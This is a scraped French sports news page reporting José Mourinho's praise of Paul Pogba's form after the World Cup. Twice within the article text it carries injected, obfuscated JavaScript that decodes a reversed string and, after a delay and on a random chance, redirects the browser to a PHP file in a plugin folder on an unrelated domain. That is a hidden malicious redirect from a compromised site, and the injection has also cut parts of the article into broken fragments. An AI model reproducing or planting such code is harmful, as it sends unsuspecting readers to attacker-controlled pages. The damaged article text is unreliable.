Manchester United – Mourinho sur Pogba : “Les bons résultats, ça fait des miracles”

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toryfull__paragraphs”>

toujours attendu quand il doit s’exprimer au sujet de Paul Pogba. L’entraîneur de Pogba manquait pourtant de préparation après la Coupe du monde. Mais Mourinho n’a pas hésité à l’aligner dès le début de la saison. Et il ne le regrette pas. “Paul est revenu du Mondial, et il a été le dernier à arriver car il a joué la finale, a-t-il expliqué. Mais je pense que le bonheur, la confiance, l’estime de soi ont été les facteurs qui l’ont poussé à jouer à notre premier match contre Leicester presque sans entraînement et il a joué un très bon match“, a expliqué le technicien portugais. “Le momentum est très important – dans le sens positif comme négatif“, a-t-il ajouté.

Pogba, 25 ans, qui porte le brassard de capitaine avec les Red Devils depuis cette saison, a notamment marqué un doublé en Ligue des champions mardi après de bonnes performances en Premier League, contrairement à d’autres stars de retour de la Coupe du monde, comme le buteur $nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tolink” href=”https://www.eurosport.fr/football/equipes/tottenham/teamcenter.shtml”>Tottenham) par exemple, en difficulté lors des premiers matches. Ces éloges arrivent alors que la presse anglaise a affirmé que le coach portugais avait reproché le mois dernier à son joueur de jouer à un meilleur niveau en sélection, où il n’était pas entouré par tous ses proches, qu’en club la saison dernière.

Source: tory.shtml” target=”_blank” rel=”noopener”>Eurosport

  • 1
  •  
  •  
  •  
  •  
    1
    Partage
  • 254
    Partages

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

%d blogueurs aiment cette page :